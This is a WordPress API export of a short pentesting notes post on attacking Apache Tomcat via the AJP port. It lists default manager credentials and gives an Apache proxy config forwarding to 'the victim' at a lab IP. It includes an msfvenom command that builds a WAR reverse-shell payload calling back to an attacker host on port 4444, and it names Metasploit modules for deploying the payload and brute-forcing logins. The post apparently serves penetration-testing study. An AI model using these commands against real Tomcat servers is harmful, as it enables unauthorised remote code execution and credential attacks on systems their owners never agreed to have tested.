{"id":1197,"date":"2020-04-13T10:28:17","date_gmt":"2020-04-13T08:28:17","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1197"},"modified":"2021-01-09T15:07:08","modified_gmt":"2021-01-09T14:07:08","slug":"apache-tomcat-jserv","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1197","title":{"rendered":"JServ Apache Tomcat"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Tom\u00adcat usu\u00adal\u00adly lis\u00adtens on the fol\u00adlow\u00ading&nbsp;ports:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>8080 \u2014&nbsp;<span class=\"caps\">HTTP<\/span><\/li><li>8005 \u2014 Port for shut\u00adting down the Tom\u00adcat serv\u00ader; not inter\u00adest\u00ading&nbsp;here<\/li><li>8009 \u2014 Same func\u00adtions as the <span class=\"caps\">HTTP<\/span> port, but via the Apache JServ pro\u00adto\u00adcol&nbsp;<span class=\"caps\">AJP<\/span>.&nbsp;<ul><li><span class=\"caps\">AJP<\/span> is basi\u00adcal\u00adly <span class=\"caps\">HTTP<\/span> in a compressed\/binary form.<\/li><\/ul><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Checklist<\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Check if \/manager is accessible.<ul><li>Default cre\u00adden\u00adtials are <em>tom\u00adcat<\/em> \/ <em>s3cret<\/em> or <em>admin<\/em> \/ <em>admin<\/em><\/li><\/ul><\/li><\/ol>\n\n\n\n<h1 class=\"wp-block-heading\"><span class=\"caps\">AJP<\/span><\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">To com\u00admu\u00adni\u00adcate via the <span class=\"caps\">AJP<\/span> port, Apache can be used to con\u00advert plain <span class=\"caps\">HTTP<\/span> requests to <span class=\"caps\">AJP<\/span> request.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Install an Apache2<\/li><li>Install liba\u00adpache2-mod-jk<\/li><li>Restart Apache2<\/li><li>Add a proxy to the victim<\/li><\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">ProxyRequests Off\n&lt;Proxy *&gt;\nOrder deny,allow\nDeny from all\nAllow from localhost\n&lt;\/Proxy&gt;\nProxyPass \/ ajp:\/\/10.11.1.222:8009\/\nProxyPassReverse \/ ajp:\/\/10.11.1.222:8009\/<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Request can now made via localhost.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Exploit<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Upload a <span class=\"caps\">WAR<\/span> file with reverse shell code (<a href=\"https:\/\/ionize.com.au\/exploiting-apache-tomcat-port-8009-using-apache-jserv-protocol\/\">Source<\/a>):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p java\/shell_reverse_tcp LHOST=192.168.109.129 LPORT=4444 -f war &gt; shell3.war<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Or do it with exploit\/multi\/http\/tomcat_mgr_deploy.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Notes<\/h1>\n\n\n\n<ul class=\"wp-block-list\"><li>Use scanner\/http\/tomcat_mgr_login to brute-force (<a href=\"https:\/\/ionize.com.au\/exploiting-apache-tomcat-port-8009-using-apache-jserv-protocol\/\">Source<\/a>)<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Overview Tom\u00adcat usu\u00adal\u00adly lis\u00adtens on the fol\u00adlow\u00ading&nbsp;ports: 8080 \u2014&nbsp;<span class=\"caps\">HTTP<\/span> 8005 \u2014 Port for shut\u00adting down the Tom\u00adcat serv\u00ader; not inter\u00adest\u00ading&nbsp;here 8009 \u2014 Same func\u00adtions as the <span class=\"caps\">HTTP<\/span> port, but via the Apache JServ pro\u00adto\u00adcol&nbsp;<span class=\"caps\">AJP<\/span>.&nbsp; <span class=\"caps\">AJP<\/span> is basi\u00adcal\u00adly <span class=\"caps\">HTTP<\/span> in a compressed\/binary form. Check\u00adlist Check if \/manager is acces\u00adsi\u00adble.&nbsp; Default cre\u00adden\u00adtials are tom\u00adcat \/ s3cret or&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[323],"tags":[248,250,249],"class_list":["post-1197","post","type-post","status-publish","format-standard","hentry","category-protocol","tag-apache-tomcat","tag-jserv","tag-tomcat"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1197","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1197"}],"version-history":[{"count":9,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1197\/revisions"}],"predecessor-version":[{"id":2158,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1197\/revisions\/2158"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1197"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1197"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1197"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}